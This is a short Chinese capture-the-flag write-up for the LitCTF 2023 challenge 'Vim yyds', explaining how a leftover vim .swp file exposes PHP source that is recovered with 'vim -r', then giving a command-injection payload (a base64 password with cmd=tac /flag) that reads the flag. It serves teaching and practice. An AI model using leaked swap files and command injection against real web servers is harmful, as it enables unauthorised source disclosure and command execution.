[LitCTF 2023]Vim yyds

打开题目

首先查看源代码,发现源代码里面什么都没有

然后扫一下目录

.swp文件:

.swp 文件一般是vim 编辑器在编辑文件时产生的,当用 vim 编辑器编辑文件时就会产生,正常退出时 .swp 文件被删除,但是如果直接叉掉(非正常退出),那么 .swp 文件就会被保留。

这个文件用vscode打开的话会出现乱码,需要用vim编辑器恢复.swp文件

复制代码
vim -r index.php.swp

恢复出来就会有这个

简单的源码审计之后

payload

复制代码
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=tac /flag;
相关推荐
汤愈韬2 分钟前
Full Cone NAT、行为模式
网络·网络协议·网络安全·security
一拳一个娘娘腔40 分钟前
攻防视角下的Windows凭证提取技术演进(2024-2026)
windows·安全
aaaffaewrerewrwer41 分钟前
免费在线 AVIF 转 WebP 工具:浏览器端批量转换,无需上传更安全
安全·个人开发
@insist1231 小时前
信息安全工程师-入侵检测系统核心原理与体系架构
安全·架构·软考·信息安全工程师·软件水平考试
HackTwoHub1 小时前
开源AI渗透测试的终极形态,让渗透测试进入“自动驾驶“时代、让渗透测试全自动!
人工智能·web安全·网络安全·开源·系统安全·安全架构·sql注入
大方子1 小时前
【PolarCTF】干正则
网络安全·polarctf
薛定e的猫咪1 小时前
OOD 感知决策与可信强化学习:从置信度评估到安全回退
人工智能·安全·机器学习·开源
Chockmans1 小时前
春秋云境CVE-2021-3019
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2021-3019
BenSmith14 小时前
从零上手嵌入式 RTOS:以 Raspberry Pi Pico 2 WH 为例的烧录、定制构建与多系统对比指南
安全
汇智信科15 小时前
训练安全管理系统:赋能军消装备训练,实现全流程智能化管控
安全·训练安全管理·装备训练智能化·军事训练保障·消防训练管理